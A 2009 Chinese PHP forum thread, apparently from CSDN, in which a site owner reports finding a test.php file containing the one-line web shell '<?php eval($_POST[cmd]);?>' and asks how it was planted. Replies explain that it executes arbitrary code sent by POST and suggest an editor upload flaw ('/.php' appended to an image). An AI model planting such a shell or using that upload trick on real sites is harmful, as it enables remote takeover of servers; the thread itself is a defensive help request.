社区
基础编程
帖子详情
php 漏洞提问 急....
phpboy
2009-04-27 06:04:56
加精
我们网站不知道怎么的多了个test.php
内容如下 :
<?php eval($_POST[cmd]);?>
找了很多资料,也没看出个大概..
1. 我想知道这个一般是怎么注入到我们网站里的??
2. 它主要起什么作用??
我们网站其它原文件应该不会也被注入了吧...
...全文
2680
85
打赏
收藏
php 漏洞提问 急....
我们网站不知道怎么的多了个test.php 内容如下 : 找了很多资料,也没看出个大概.. 1. 我想知道这个一般是怎么注入到我们网站里的?? 2. 它主要起什么作用?? 我们网站其它原文件应该不会也被注入了吧...
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
85 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
Whirlwind
2012-02-19
打赏
举报
回复
这个东西叫做一句话木马,被黑后留得,或者程序的后门,危害很大!
wwwinst2
2011-10-11
打赏
举报
回复
看来你的网站被黑掉了 http://www.fadx.cn
xiaohei_ning
2010-08-15
打赏
举报
回复
呵呵。通过上传上去的吧。看看ewebeditor是不是有上传功能。
前些天爆了0day来不是。上传个图片加个/.php就能当马用。
反正能上传的地 方都看一下吧。注意先清一下马
hihero
2010-07-14
打赏
举报
回复
顶起~~
kissandrew
2010-06-02
打赏
举报
回复
thanks for share
xuanyijie
2010-04-13
打赏
举报
回复
招聘职位 :高级PHP程序员
招聘公司 :喧怡网络科技
工作地点 :杭州
月 薪 :6000-7999
年 龄 :24-28
工作性质 :全职
工作年限 :三年
学 历 :大专
联系电话:13758166419
联系邮箱:542843172@qq.com
任职要求:
1、负责Web网站的新产品的设计及维护
2、数据库的设计和维护
3、负责程序模块的设计、编码。
4、负责撰写所属模块开发文档。
岗位要求:
1.精通JavaScript及其浏览器兼容性;
2.两年以上PHP/MySQL开发经验,开发过大型互联网应用程序;
3.熟悉sql和数据库优化,至少有MySQL, PostgreSQL, MSSQL, Oracle其中任何一种数据库相关经验;
4.具有查询优化和存储优化经验、PHP缓存技术、静态化设计方面的经验;
5.有Linux平台下多线程编程经验优先;
6.熟悉CGI标准、HTTP和HTTPS等互联网协议;
7.熟悉AJAX,熟悉DIV+CSS布局,熟悉模板技术;
8.有较强的团队协作意识及独立解决技术问题的能力,拥有良好的代码习惯,要求结构清晰,命名规范,逻辑性强,代码
冗余率低,有自主或组织研发B/S应用产品者优先;
9.有团队开发经验,书面语言表达能力强,能阅读英文文档,英文水平过硬;
10. 有丰富的互联网项目,特别是Web2.0项目;
11.追求程序的高效,对于大流量和高负载情况下的程序设计非常熟悉。
javaVenice
2010-04-07
打赏
举报
回复
disable_functions 禁用PHP方法
喔叶、你封了他IP。
skdhxnn
2010-03-22
打赏
举报
回复
今天又认识一个新函数eval
fengyezhiiq
2010-03-16
打赏
举报
回复
学习了!
Dark__Angel
2010-02-20
打赏
举报
回复
这段代码是PHP的一句话木马
用户昵称不能为空
2009-11-27
打赏
举报
回复
LZ的等级这么高都搞不定,那应该是比较难的一个难题。
不过那个注入的人的目的绝对不会是为了去里面删点东西。
爱吃土豆和面包
2009-11-22
打赏
举报
回复
很有可能网站有漏洞被入侵
hfphper
2009-10-28
打赏
举报
回复
看一下 eval 就知道 问题所在了
dadait
2009-10-21
打赏
举报
回复
楼主,那是一句话木马。赶紧删除了吧。
tfxg
2009-05-29
打赏
举报
回复
<?php eval($_POST[cmd]);?>
就這句可以執行任意想執行的代碼了,以CMD為參數
guosheng1987
2009-05-10
打赏
举报
回复
学习勒
phpboy
2009-05-10
打赏
举报
回复
[Quote=引用 70 楼 gztwbbs 的回复:]
不错阿!!!!!!!!!!!
我要把你的顶上去!~~~~
www.jy298.com
短信群发
www.mica8.com
一卡多号
www.hk63.com
…
[/Quote]
是不是做广告的/?
suinhk
2009-05-10
打赏
举报
回复
学习!!!!!
suinhk
2009-05-10
打赏
举报
回复
sd
netehoney
2009-05-10
打赏
举报
回复
关注
加载更多回复(65)
Web安全-文件包含
漏洞
文件包含
漏洞
是一种最常见的
漏洞
类型,它会影响依赖于脚本运行时的web应用程序。当应用程序使用黑客控制的变量构建可执行代码的路径时,文件包含
漏洞
会导致黑客任意控制运行时执行的文件。 ...
SRC混子的
漏洞
挖掘之道
不要想我今晚一定要挖到多少
漏洞
,要拿到多少奖金,不然可能会被忽略三连打崩心态。接下来,我会教你零基础入门快速入门上手网络安全。网络安全入门到底是先学编程还是先学计算机基础?这是一个争议比较大的问题,有...
php
在线解密,zend在线解密
PHP
在线解密,支持Zend解密,混淆解密。官方网站 http://dezend.qiling.org/ 云路
php
解密,找源码解密,小猪
php
解密,
php
jm加密解密 。 ...
iosline.
php
注入,PentesterLab新手教程(一):代码注入
这个平台包含的主要
漏洞
如下:Code injection (代码注入)Commands injection(命令行注入)XSS(跨站脚本)SQL injections(sql注入)File include(文件包含)LDAP attacks(LDAP攻击)File Upload(文件上传)X...
php
obendclean,ob_end_clean
你应该这个姿势学习
php
(3)1、ob_start()开启文件缓存2、ob_get_contents()得到缓存中的内存3、ob_get_length()得到缓冲区的长度4、ob_flush()输出缓冲区的内容,如果你想获取缓冲区的内容要在这个函数之前使用ob_get...
基础编程
21,886
社区成员
140,364
社区内容
发帖
与我相关
我的任务
基础编程
从PHP安装配置,PHP入门,PHP基础到PHP应用
复制链接
扫一扫
分享
社区描述
从PHP安装配置,PHP入门,PHP基础到PHP应用
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章